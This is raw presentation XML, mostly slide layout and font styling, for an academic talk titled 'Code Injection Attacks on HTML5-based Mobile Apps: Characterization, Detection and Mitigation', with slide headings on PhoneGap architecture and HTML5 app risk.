              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-114300">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="889000" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1092200" indent="-101600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="121" name="Group 121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="119" name="Shape 119"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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 rot="5400000">
            <a:off x="10847187" y="-3531994"/>
            <a:ext cx="3908827" cy="2057404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573">
            <a:spAutoFit/>
          </a:bodyPr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xfrm rot="5400000">
            <a:off x="-13536820" y="-15419195"/>
            <a:ext cx="3908827" cy="6019804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="203200" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="482600" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-114300">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="889000" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1092200" indent="-101600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5954"/>
            <a:ext cx="9163055" cy="7810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2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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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 sz="1200">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="131" name="Group 131"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25428" y="-66213"/>
            <a:ext cx="9190332" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190331" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Shape 129"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218625"/>
              <a:ext cx="9163027" cy="465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317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latin typeface="Constantia"/>
                  <a:ea typeface="Constantia"/>
                  <a:cs typeface="Constantia"/>
                  <a:sym typeface="Constantia"/>
                </a:defRPr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21435692">
              <a:off x="10704" y="273583"/>
              <a:ext cx="9175789" cy="379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317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latin typeface="Constantia"/>
                  <a:ea typeface="Constantia"/>
                  <a:cs typeface="Constantia"/>
                  <a:sym typeface="Constantia"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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85888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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1451373"/>
            <a:ext cx="8229600" cy="3692127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34289" tIns="34289" rIns="34289" bIns="34289"/>
          <a:lstStyle>
            <a:lvl1pPr marL="189034" indent="-189034">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="95000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="578247" indent="-184546">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="879247" indent="-210911">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1166494" indent="-188594">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1441131" indent="-188594">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800"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xfrm>
            <a:off x="7924800" y="4901407"/>
            <a:ext cx="762000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3994526" cy="39433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457200" y="4406308"/>
            <a:ext cx="8229600" cy="737197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/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9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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 rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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533400" y="0"/>
            <a:ext cx="7851648" cy="2400300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r"/>
          </a:lstStyle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533400" y="2421401"/>
            <a:ext cx="7854696" cy="2722100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle>
            <a:lvl1pPr marR="38100" algn="r">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:lvl1pPr>
            <a:lvl2pPr marR="38100" algn="r">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:lvl2pPr>
            <a:lvl3pPr marR="38100" algn="r">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:lvl3pPr>
            <a:lvl4pPr marR="38100" algn="r">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:lvl4pPr>
            <a:lvl5pPr marR="38100" algn="r">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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D1EAEE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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Shape 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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 rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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85888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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457200" y="1451373"/>
            <a:ext cx="8229600" cy="3692127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle>
            <a:lvl1pPr marL="203200" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="482600" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-114300">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="889000" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1092200" indent="-101600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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04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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Shape 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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 rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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530351" y="0"/>
            <a:ext cx="7772401" cy="2009395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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530351" y="2028498"/>
            <a:ext cx="7772401" cy="3115002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle/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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000" cy="1397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900">
                <a:solidFill>
                  <a:srgbClr val="D1EAEE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3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1" tIns="91421" rIns="91421" bIns="91421" anchor="b"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1" tIns="91421" rIns="91421" bIns="91421"/>
          <a:lstStyle/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556790" y="4762636"/>
            <a:ext cx="548704" cy="367941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91421" tIns="91421" rIns="91421" bIns="91421" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1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 spd="med"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr>
        <a:defRPr sz="1400">
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr algn="r">
        <a:defRPr sz="13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algn="r">
        <a:defRPr sz="13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algn="r">
        <a:defRPr sz="13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algn="r">
        <a:defRPr sz="13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algn="r">
        <a:defRPr sz="13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3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3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3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3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685800" y="1101375"/>
            <a:ext cx="7772400" cy="16419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Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation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685800" y="2840046"/>
            <a:ext cx="7886700" cy="15201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66666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin and Gautam Nagesh Peri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xfrm>
            <a:off x="457200" y="528637"/>
            <a:ext cx="8229600" cy="8574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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PhoneGap Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="image5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39138" y="1385887"/>
            <a:ext cx="5954103" cy="33404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xfrm>
            <a:off x="1072662" y="1926613"/>
            <a:ext cx="8229601" cy="8574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2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="38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rPr>
              <a:t>HTML5-based Mobile App and Risk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858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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="4622002"/>
            <a:ext cx="762000" cy="139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900">
                <a:solidFill>
                  <a:srgbClr val="045C75"/>
                </a:solidFill>
              </a:rPr>
